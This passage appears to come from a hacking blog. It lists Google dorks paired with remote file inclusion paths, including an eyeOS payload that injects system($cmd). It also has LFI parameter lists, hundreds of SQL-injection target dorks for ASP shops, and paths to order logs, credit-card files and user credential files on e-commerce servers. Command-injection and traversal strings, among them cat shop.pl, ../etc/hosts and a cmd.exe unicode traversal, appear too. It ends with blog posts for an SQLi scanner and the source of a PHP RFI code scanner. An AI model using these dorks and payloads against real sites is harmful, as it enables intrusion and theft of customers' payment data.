/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=
10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=
11. keyword : “Powered by phpBB 2.0.6?
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=
12. keyword : “powered by CubeCart 3.0.6?
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
13. keyword : “powered by paBugs 2.0 Beta 3?
/class.mysql.php?path_to_bt_dir=
14. allinurl:”powered by AshNews”, allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=
15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=
16. allinurl:ihm.php?p=*
14. keyword : “powered eyeOs”
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=
15. allinurl:.php?bodyfile=
16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
17. allinurl:forums.html
/modules.php?name=
18. allinurl:/default.php?page=home
19. allinurl:/folder.php?id=
20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=
21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( “powered by AllMyGuests”)
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
22. allinurl:application.php?base_path=
/application.php?base_path=
23. allinurlp:hplivehelper
/phplivehelper/initiate.php?abs_path=
24. allinurlp:hpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
25. key word : “powered by Fantastic News v2.1.2?
/archive.php?CONFIG[script_path]=
26. keyword: “powered by smartblog” AND inurl:?page=login
/index.php?page=
27. allinurl:/forum/
/forum/admin/index.php?inc_conf=
28. keyword:”Powered By FusionPHP”
/templates/headline_temp.php?nst_inc=
29. allinurl:shoutbox/expanded.php filetypep:hp
/shoutbox/expanded.php?conf=
30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=
31. keyword : “Powered by iUser”
/common.php?include_path=
32. allinurl: “static.php?load=”
/static.php?load=
33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=
34. keyworld: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=
35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=
LFI
acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url=
user=
inurl:"add.asp?bookid="
inurl:"add_cart.asp?num="
inurl:"addcart.asp?"
inurl:"addItem.asp"
inurl:"add-to-cart.asp?ID="
inurl:"addToCart.asp?idProduct="
inurl:"addtomylist.asp?ProdId="
inurl:"adminEditProductFields.asp?intProdID="
inurl:"advSearch_h.asp?idCategory="
inurl:"affiliate.asp?ID="
inurl:"affiliate-agreement.cfm?storeid="
inurl:"affiliates.asp?id="
inurl:"ancillary.asp?ID="
inurl:"archive.asp?id="
inurl:"article.asp?id="
inurl:"aspx?PageID"
inurl:"basket.asp?id="
inurl:"Book.asp?bookID="
inurl:"book_list.asp?bookid="
inurl:"book_view.asp?bookid="
inurl:"BookDetails.asp?ID="
inurl:"browse.asp?catid="
inurl:"browse_item_details.asp"
inurl:"Browse_Item_Details.asp?Store_Id="
inurl:"buy.asp?"
inurl:"buy.asp?bookid="
inurl:"bycategory.asp?id="
inurl:"cardinfo.asp?card="
inurl:"cart.asp?action="
inurl:"cart.asp?cart_id="
inurl:"cart.asp?id="
inurl:"cart_additem.asp?id="
inurl:"cart_validate.asp?id="
inurl:"cartadd.asp?id="
inurl:"cat.asp?iCat="
inurl:"catalog.asp"
inurl:"catalog.asp?CatalogID="
inurl:"catalog_item.asp?ID="
inurl:"catalog_main.asp?catid="
inurl:"category.asp"
inurl:"category.asp?catid="
inurl:"category_list.asp?id="
inurl:"categorydisplay.asp?catid="
inurl:"checkout.asp?cartid="
inurl:"checkout.asp?UserID="
inurl:"checkout_confirmed.asp?order_id="
inurl:"checkout1.asp?cartid="
inurl:"comersus_listCategoriesAndProducts.asp?idCategory ="
inurl:"comersus_optEmailToFriendForm.asp?idProduct="
inurl:"comersus_optReviewReadExec.asp?idProduct="
inurl:"comersus_viewItem.asp?idProduct="
inurl:"comments_form.asp?ID="
inurl:"contact.asp?cartId="
inurl:"content.asp?id="
inurl:"customerService.asp?TextID1="
inurl:"default.asp?catID="
inurl:"description.asp?bookid="
inurl:"details.asp?BookID="
inurl:"details.asp?Press_Release_ID="
inurl:"details.asp?Product_ID="
inurl:"details.asp?Service_ID="
inurl:"display_item.asp?id="
inurl:"displayproducts.asp"
inurl:"downloadTrial.asp?intProdID="
inurl:"emailproduct.asp?itemid="
inurl:"emailToFriend.asp?idProduct="
inurl:"events.asp?ID="
inurl:"faq.asp?cartID="
inurl:"faq_list.asp?id="
inurl:"faqs.asp?id="
inurl:"feedback.asp?title="
inurl:"freedownload.asp?bookid="
inurl:"fullDisplay.asp?item="
inurl:"getbook.asp?bookid="
inurl:"GetItems.asp?itemid="
inurl:"giftDetail.asp?id="
inurl:"help.asp?CartId="
inurl:"home.asp?id="
inurl:"index.asp?cart="
inurl:"index.asp?cartID="
inurl:"index.asp?ID="
inurl:"info.asp?ID="
inurl:"item.asp?eid="
inurl:"item.asp?item_id="
inurl:"item.asp?itemid="
inurl:"item.asp?model="
inurl:"item.asp?prodtype="
inurl:"item.asp?shopcd="
inurl:"item_details.asp?catid="
inurl:"item_list.asp?maingroup"
inurl:"item_show.asp?code_no="
inurl:"itemDesc.asp?CartId="
inurl:"itemdetail.asp?item="
inurl:"itemdetails.asp?catalogid="
inurl:"learnmore.asp?cartID="
inurl:"links.asp?catid="
inurl:"list.asp?bookid="
inurl:"List.asp?CatID="
inurl:"listcategoriesandproducts.asp?idCategory="
inurl:"modline.asp?id="
inurl:"myaccount.asp?catid="
inurl:"news.asp?id="
inurl:"order.asp?BookID="
inurl:"order.asp?id="
inurl:"order.asp?item_ID="
inurl:"OrderForm.asp?Cart="
inurl:"page.asp?PartID="
inurl:"payment.asp?CartID="
inurl:"pdetail.asp?item_id="
inurl:"powersearch.asp?CartId="
inurl:"privacy.asp?cartID="
inurl:"prodbycat.asp?intCatalogID="
inurl:"prodetails.asp?prodid="
inurl:"prodlist.asp?catid="
inurl:"product.asp?bookID="
inurl:"product.asp?intProdID="
inurl:"product_info.asp?item_id="
inurl:"productDetails.asp?idProduct="
inurl:"productDisplay.asp"
inurl:"productinfo.asp?item="
inurl:"productlist.asp?ViewType=Category&CategoryID= "
inurl:"productpage.asp"
inurl:"products.asp?ID="
inurl:"products.asp?keyword="
inurl:"products_category.asp?CategoryID="
inurl:"products_detail.asp?CategoryID="
inurl:"productsByCategory.asp?intCatalogID="
inurl:"prodView.asp?idProduct="
inurl:"promo.asp?id="
inurl:"promotion.asp?catid="
inurl:"pview.asp?Item="
inurl:"resellers.asp?idCategory="
inurl:"results.asp?cat="
inurl:"savecart.asp?CartId="
inurl:"search.asp?CartID="
inurl:"searchcat.asp?search_id="
inurl:"Select_Item.asp?id="
inurl:"Services.asp?ID="
inurl:"shippinginfo.asp?CartId="
inurl:"shop.asp?a="
inurl:"shop.asp?action="
inurl:"shop.asp?bookid="
inurl:"shop.asp?cartID="
inurl:"shop_details.asp?prodid="
inurl:"shopaddtocart.asp"
inurl:"shopaddtocart.asp?catalogid="
inurl:"shopbasket.asp?bookid="
inurl:"shopbycategory.asp?catid="
inurl:"shopcart.asp?title="
inurl:"shopcreatorder.asp"
inurl:"shopcurrency.asp?cid="
inurl:"shopdc.asp?bookid="
inurl:"shopdisplaycategories.asp"
inurl:"shopdisplayproduct.asp?catalogid="
inurl:"shopdisplayproducts.asp"
inurl:"shopexd.asp"
inurl:"shopexd.asp?catalogid="
inurl:"shopping_basket.asp?cartID="
inurl:"shopprojectlogin.asp"
inurl:"shopquery.asp?catalogid="
inurl:"shopremoveitem.asp?cartid="
inurl:"shopreviewadd.asp?id="
inurl:"shopreviewlist.asp?id="
inurl:"ShopSearch.asp?CategoryID="
inurl:"shoptellafriend.asp?id="
inurl:"shopthanks.asp"
inurl:"shopwelcome.asp?title="
inurl:"show_item.asp?id="
inurl:"show_item_details.asp?item_id="
inurl:"showbook.asp?bookid="
inurl:"showStore.asp?catID="
inurl:"shprodde.asp?SKU="
inurl:"specials.asp?id="
inurl:"store.asp?id="
inurl:"store_bycat.asp?id="
inurl:"store_listing.asp?id="
inurl:"Store_ViewProducts.asp?Cat="
inurl:"store-details.asp?id="
inurl:"storefront.asp?id="
inurl:"storefronts.asp?title="
inurl:"storeitem.asp?item="
inurl:"StoreRedirect.asp?ID="
inurl:"subcategories.asp?id="
inurl:"tek9.asp?"
inurl:"template.asp?Action=Item&pid="
inurl:"topic.asp?ID="
inurl:"tuangou.asp?bookid="
inurl:"type.asp?iType="
inurl:"updatebasket.asp?bookid="
inurl:"updates.asp?ID="
inurl:"view.asp?cid="
inurl:"view_cart.asp?title="
inurl:"view_detail.asp?ID="
inurl:"viewcart.asp?CartId="
inurl:"viewCart.asp?userID="
inurl:"viewCat_h.asp?idCategory="
inurl:"viewevent.asp?EventID="
inurl:"viewitem.asp?recor="
inurl:"viewPrd.asp?idcategory="
inurl:"ViewProduct.asp?misc="
inurl:"voteList.asp?item_ID="
inurl:"whatsnew.asp?idCategory="
inurl:"WsAncillary.asp?ID="/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&ac count=administrator
/super_stats/access_logs
/trafficlog
/wwwlog
/Admin_files/order.log
/bin/orders/orders.txt
/cgi/orders/orders.txt
/cgi-bin/orders/orders.txt
/cgi-sys/orders/orders.txt
/cgi-local/orders/orders.txt
/htbin/orders/orders.txt
/cgibin/orders/orders.txt
/cgis/orders/orders.txt
/scripts/orders/orders.txt
/cgi-win/orders/orders.txt
/bin/pagelog.cgi
/cgi/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-sys/pagelog.cgi
/cgi-local/pagelog.cgi
/cgibin/pagelog.cgi
/cgis/pagelog.cgi
/scripts/pagelog.cgi
/cgi-win/pagelog.cgi
/bin/DCShop/auth_data/auth_user_file.txt
/cgi/DCShop/auth_data/auth_user_file.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/cgi-local/DCShop/auth_data/auth_user_file.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/cgibin/DCShop/auth_data/auth_user_file.txt
/cgis/DCShop/auth_data/auth_user_file.txt
/scripts/DCShop/auth_data/auth_user_file.txt
/cgi-win/DCShop/auth_data/auth_user_file.txt
/bin/DCShop/orders/orders.txt
/cgi/DCShop/orders/orders.txt
/cgi-bin/DCShop/orders/orders.txt
/cgi-sys/DCShop/orders/orders.txt
/cgi-local/DCShop/orders/orders.txt
/htbin/DCShop/orders/orders.txt
/cgibin/DCShop/orders/orders.txt
/cgis/DCShop/orders/orders.txt
/scripts/DCShop/orders/orders.txt
/cgi-win/DCShop/orders/orders.txt
/dc/auth_data/auth_user_file.txt
/dcshop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/orders/checks.txt
/orders/mountain.cfg
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/webcart/carts
/webcart-lite/orders/import.txt
/webcart/config
/webcart/config/clients.txt
/webcart/orders
/webcart/orders/import.txt
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/bin/shop/auth_data/auth_user_file.txt
/cgi/shop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-sys/shop/auth_data/auth_user_file.txt
/cgi-local/shop/auth_data/auth_user_file.txt
/htbin/shop/auth_data/auth_user_file.txt
/cgibin/shop/auth_data/auth_user_file.txt
/cgis/shop/auth_data/auth_user_file.txt
/scripts/shop/auth_data/auth_user_file.txt
/cgi-win/shop/auth_data/auth_user_file.txt
/bin/shop/orders/orders.txt
/cgi/shop/orders/orders.txt
/cgi-bin/shop/orders/orders.txt
/cgi-sys/shop/orders/orders.txt
/cgi-local/shop/orders/orders.txt
/htbin/shop/orders/orders.txt
/cgibin/shop/orders/orders.txt
/cgis/shop/orders/orders.txt
/scripts/shop/orders/orders.txt
/cgi-win/shop/orders/orders.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin/shop.pl/page=;cat%20shop.pl
/cgi-sys/shop.pl/page=;cat%20shop.pl
/cgi-local/shop.pl/page=;cat%20shop.pl
/htbin/shop.pl/page=;cat%20shop.pl
/cgibin/shop.pl/page=;cat%20shop.pl
/cgis/shop.pl/page=;cat%20shop.pl
/scripts/shop.pl/page=;cat%20shop.pl
/cgi-win/shop.pl/page=;cat%20shop.pl
/webcart-lite/orders/import.txt
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/cgis/cart.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/cgis/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/bin/cart32.exe
/cgi/cart32.exe
/cgi-bin/cart32.exe
/cgi-sys/cart32.exe
/cgi-local/cart32.exe
/htbin/cart32.exe
/cgibin/cart32.exe
/cgis/cart32.exe
/scripts/cart32.exe
/cgi-win/cart32.exe
/cgi-bin/www-sql;;;
/server%20logfile;;;
/cgi-bin/pdg_cart/order.log
/cgi-bin/shopper.exe?search
/orders/order.log
/orders/import.txt
/orders/checks.txt
/orders/orders.txt
/Orders/order.log
/order/order.log
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/_private/orders.txt
/_private/orders.htm
/orders/mountain.cfg
/PDG_Cart/shopper.config
/Admin_files/order.log
/mall_log_files/order.log
/PDG_Cart/order.log
/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp&Board=6210&Idle=10&Sort=0&Order=Des cend&Page=0&Session=;;;
/_private/shopping_cart.mdb
/cgi-bin/shopper.cgi
/cgi-bin/shop.cgi
/cgi-bin/perlshop.cgi
/cgi-bin/mall2000.cgi
/log/
/logfile/
/logfiles/
/logger/
/logging/
/logs/
/logs/access_log
/weblog/
/weblogs/
/cgi-bin/loadpage.cgi
/database/
/databases/
/cgi-bin/Web_Store/web_store.cgi
/scripts/cart32.exe
/scripts/c32web.exe
/cgi-bin/shopper?search=action&keywords=dhenzuser%20&templa te=order.log
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/cart32/whatever-OUTPUT.txt
/cgi-bin/shopper.cgi?search=action&keywords=root%20&templat e=order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/derbyteccgi/shopper.cgi?search=action&keywords=moron&template= order.log
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;c at%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
/ccbill/secure/ccbill.log
/cgibin/shopper.cgi?search=action&keywords=moron&template= order.csv
/order13.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin/PDG_Cart/order.log
/cgi-bin/shopper.cgi?search=action&keywords=whinhall&templa te=order.log
/orders/db/zzzbizorders.log.html
/cgi-bin/Shopper.exe?search=action&keywords=psiber%20&templ ate=other
isinglogorder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template =order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order. log
/cgi-bin/shopper.exe?preadd=action&key=bajk390ss&template=o rder.log
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/cart32/CART32-order.txt
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
/cgi-bin/cart32.ini
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/cart32.exe/error
/metacart/database/metacart.mdb
//shopping/database/metacart.mdb
/shopping/database/metacart.mdb
/fpdb/shop.mdb
/cgi-bin/shopper.cgi?keywords=usstick&search=action&templat e=order.log
/cgi-bin/shopper.cgi?display=action&template=order.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=order. log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=sales. log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=sell.l og
/cgi-bin/shopper.exe?key=8360&preadd=action&template=admin. log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=admin_ files.log
/cgi-bin/shopper.cgi?keywords=usstick&search=action&templat e=order.log
/cgi-bin/shopper.cgi?keywords=psiber&search=action&template =order.log
/cgi-bin/shopper.cgi?keywords=9461&search=action&template=o rder.log
/cgi-bin/shopper.cgi?keywords=SC7021&search=action&template =order.log
/cgi-bin/shopper.cgi?keywords=cc&search=action&template=ord er.log
/cgi-bin/shopper.cgi?keywords=order&search=action&template= order.log
/cgi-bin/shopper.cgi?display=action&template=order.log
/cgi-bin/shopper.cgi?search=action&keywords=moron%20&templa te=shopper.conf
/Merchant2/modules/log/elf.mv?search=action&ORDERLOG.txt
/Merchant2/modules/log/malf.mv?search=action&ORDERLOG.txt
/cgi-bin/shopper.exe?search=action&keywords=CD006&template= sales.log
/cgi-bin/shopper.exe?search=action&keywords=***&template=se ll.log
/cgi-bin/shopper.exe?search=action&keywords=order&template= admin.log
/cgi-bin/shopper.exe?search=action&keywords=cc&template=adm in_files.log
/cgi-bin/shopper.exe?search=action&keywords=hack&template=o rder.log
/cgi-bin/shopper.exe?search=action&keywords=9400&template=o rder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template =order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/shopper.cgi?search=action&keywords=root%20&templat e=order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order. log
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/cgi-bin/cart32/mainframephotographics-ORDERS.txt
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/stats/08-hosts.htm&TEMPLATE=ORDER.LOG
/worlddirect/Web_store/Admin_files/order.log
/website/
/WebShop/templates/cc.txt
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/logs/
/WebShop/
/WebCart/orders.txt
/webcart/
/Web_store/Admin_files/order.log
/STORE/orders.txt
/stats/08-hosts.htm&TEMPLATE=ORDER.LOG
/PSUser/PSCOErrPage.htm
/PDG_Cart/shopper.conf
/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/PDG/order.txt
/orders/results
/Orders/orders.txt
/orders/order.log
/orders/mountain.cf
/orders/import.txt
/orders/import.txt
/orders/checks.txt
/orders/
/orders.txt
/orders.htm
/orderform/orders.txt
/order.txt
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper.exe?search=action&keywords=%20&template=sh opper.conf
/cgi-bin/shopper.exe
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cgi-bin/perlshop.cgi
/cgi-bin/PDG_Cart/cc.log
/cgi-bin/orders/mc.txt
/cgi-bin/orders/cc.txt
/cgi-bin/orders.txt
/cgi-bin/orderlog.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtm
/cgi-bin/ezmall2000/mall_log_files/order.log
/cgi-bin/cart32/mainframephotographics-ORDERS.txt
/cgi-bin/cart32/CART32-order.txt
/cgi-bin/cart.pl
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/AdvWorks/equipment/catalog_type.asp
/Admin_files/order.log
/admin/Orders/orders.txt
sexta-feira, 25 de fevereiro de 2011
SCANNER SQLI ONLINE - GOOGLE INURL BRASIL
Scanner SQLI Google INURL Brasil, utilizando dork simples resultados imediatos sem riscos de virus e 100% gratuito.
uso indevido responsabilidade do usuario todo conteúdo com fins de estudo.
uso indevido responsabilidade do usuario todo conteúdo com fins de estudo.
domingo, 20 de fevereiro de 2011
SCRIPT PHP Security-Shell RFI Scanner v1.0
Segurança Shell RFI Scanner v1.0 é um scan de rfi pra você scanner de plantão.
* Copyright (C) 2007 por pentest
* Http://security-sh3ll.com
* Este programa é software livre, pode redistribuí-lo e / ou modificá-
* Sob os termos da GNU General Public License conforme publicada pela
** Mas SEM NENHUMA GARANTIA, sem mesmo a garantia implícita de *COMERCIALIZAÇÃO ou ADEQUAÇÃO PARA UM DETERMINADO PROPÓSITO. Veja o * Licença Pública Geral GNU para obter mais detalhes.
/***************************************************************************
* PHP Security-Shell RFI Scanner v1.0 *
* *
* Copyright (C) 2007 by pentest *
* *
* http://security-sh3ll.com *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
* This program is distributed in the hope that it will be useful, *
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
* GNU General Public License for more details. *
* *
***************************************************************************/
$escan_inc_regex = array( '/include(_once)?.\$/ix', '/require(_once)?.\$/ix' );
/* Regex to extract the names of variables */
$escan_var_regex = array( '/\Ainclude(_once)?./is', '/\Arequire(_once)?./is' );
/* Array of file extensions to scan */
$escan_valid_ext = array( 'php' );
/* Maximum size of a file to scan, scans all if 0 */
$escan_max_size = 0;
/* Counter crawled directory */
$escan_dir_count = 0;
/* Perpetual scanned files */
$escan_file_count = 0;
/* Perpetual potential rfi found */
$escan_match_count = 0;
/*Perpetual crawled total bytes */
$escan_byte_count = 0;
escan_banner();
if( $argc < 2 ){
escan_usage($argv[0]);
}
else{
$stime = escan_get_mtime();
escan_recurse_dir( realpath($argv[1]).DIRECTORY_SEPARATOR );
$etime = escan_get_mtime();
print "\n@ Scan report : \n\n" .
"\t$escan_dir_count directory .\n".
"\t$escan_file_count file .\n".
"\t" . escan_format_size($escan_byte_count) . " .\n".
"\t$escan_match_count Potential RFI .\n".
"\t".($etime-$stime) . " Second Processing .\n\n";
}
/* A string formats in a magnitude expressed in bytes */
function escan_format_size($bytes)
{
if( $bytes < 1024 ) return "$bytes bytes";
if( $bytes < 1048576 ) return ($bytes / 1024) . " Kb";
if( $bytes < 1073741824 ) return ($bytes / 1048576) . " Mb";
return ($bytes / 1073741824) . " Gb";
}
/* Returns the timestamp in seconds */
function escan_get_mtime()
{
list($usec, $sec) = explode(" ",microtime());
return ((float)$usec + (float)$sec);
}
/* Extracts line of code inclusion */
function escan_scan_line($content,$offset)
{
list( $line, $dummy ) = explode( ";" , substr($content,$offset,strlen($content)) );
return $line.";";
}
/* Extract the variable name from line of code inclusion */
function escan_parse_var( $line, $regex_id )
{
global $escan_var_regex;
$vars = preg_split($escan_var_regex[$regex_id],$line);
$varname = $vars[1];
$delimiters = " .);";
for( $i = 0; $i < strlen($varname); $i++ ){
for( $j = 0; $j < strlen($delimiters); $j++ ){
if($varname[$i] == $delimiters[$j]){
return substr( $varname, 0, $i );
}
}
}
return $varname;
}
/* Check if the variable $var is defined in $content before position $offset*/
function escan_check_definitions($content,$offset,$var)
{
if( strpos( $var, "->" ) ){
return 1;
}
$chunk = substr($content,0,$offset);
$regex = "/".preg_quote($var,"/")."\s*=/ix";
preg_match( $regex, $chunk,$matches );
return count($matches);
}
/* $file the file to check for potential rfi */
function escan_parse_file($file)
{
global $escan_inc_regex;
global $escan_max_size;
global $escan_file_count;
global $escan_match_count;
global $escan_byte_count;
$fsize = filesize($file);
if( $escan_max_size && $fsize > $escan_max_size ) return;
$escan_file_count++;
$escan_byte_count += $fsize;
$content = @file_get_contents($file);
for( $i = 0; $i < count($escan_inc_regex); $i++ ){
if( preg_match_all( $escan_inc_regex[$i], $content, $matches, PREG_OFFSET_CAPTURE ) ){
$nmatch = count($matches[0]);
for( $j = 0; $j < $nmatch; $j++ ){
$offset = $matches[0][$j][1];
$line = escan_scan_line($content,$offset);
$var = escan_parse_var($line,$i);
if( escan_check_definitions($content,$offset,$var) == 0 )
{
$escan_match_count++;
print "@ $file - \n\t- '$var' The position $offset .\n";
}
}
}
}
}
/* Returns the file extension $fname */
function escan_get_file_ext($fname)
{
if( strchr($fname,'.') ){
return substr($fname,strrpos($fname,'.')+1);
}
else{
return "";
}
}
/* Check if file $fname is a valid extension */
function escan_isvalid_ext($fname)
{
global $escan_valid_ext;
for( $i = 0; $i < count($escan_valid_ext); $i++ ){
if(strstr(escan_get_file_ext($fname),$escan_valid_ext[$i])){
return true;
}
}
return false;
}
/* That function scans directories recursively */
function escan_recurse_dir($dir)
{
global $escan_dir_count;
$escan_dir_count++;
if( $cdir = @dir($dir) ){
while( $entry = $cdir->read() ){
if( $entry != '.' && $entry != '..' ){
if( is_dir($dir.$entry) ){
escan_recurse_dir($dir.$entry.DIRECTORY_SEPARATOR);
}
else{
if( escan_isvalid_ext($dir.$entry) ){
escan_parse_file($dir.$entry);
}
}
}
}
$cdir->close();
}
}
function escan_banner()
{
print "*-----------------------------------------------------*\n" .
"* PHP Security-Shell RFI Scanner v1.0 by pentest *\n" .
"* *\n" .
"* http://security-sh3ll.com *\n" .
"*-----------------------------------------------------*\n\n";
}
function escan_usage($pname)
{
print "Use : php $pname
}
Assinar:
Postagens (Atom)